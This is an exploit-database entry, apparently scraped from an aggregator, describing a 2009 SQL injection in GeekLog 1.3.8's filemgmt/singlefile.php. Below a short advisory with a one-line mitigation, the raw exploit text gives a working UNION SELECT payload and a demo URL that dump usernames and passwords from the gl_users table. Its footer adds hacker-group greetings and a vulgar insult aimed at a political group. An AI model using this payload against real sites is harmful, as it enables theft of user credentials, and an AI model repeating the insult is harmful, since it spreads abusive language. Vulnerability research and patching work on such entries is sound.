GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability

vendor:

GeekLog

by:

Gamoscu

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: GeekLog

Affected Version From: 1.3.8

Affected Version To: 1.3.8

Patch Exists: YES

Related CWE: N/A

CPE: a:geeklog:geeklog:1.3.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability

GeekLog v1.3.8 is vulnerable to a SQL injection vulnerability in the filemgmt/singlefile.php?lid=1 parameter. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable parameter. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

GeekLog v1.3.8  (filemgmt) SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog :http://gamoscu.wordpress.com/

Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8

Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8

###########################

[ Vulnerable File ]

filemgmt/singlefile.php?lid=1 [ SQL ]

[ XpL ]

-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--

[ Demo]

http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--

##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/
#
# Manas58  Delibey  Tiamo  Psiko  Turco  infazci  X-TRO
#
#
#
#            #Elektrikist#
#
#
#
#             FREEGAZA
#
#
#            PKK ALEM SIKSIN SIZI
#
#############################################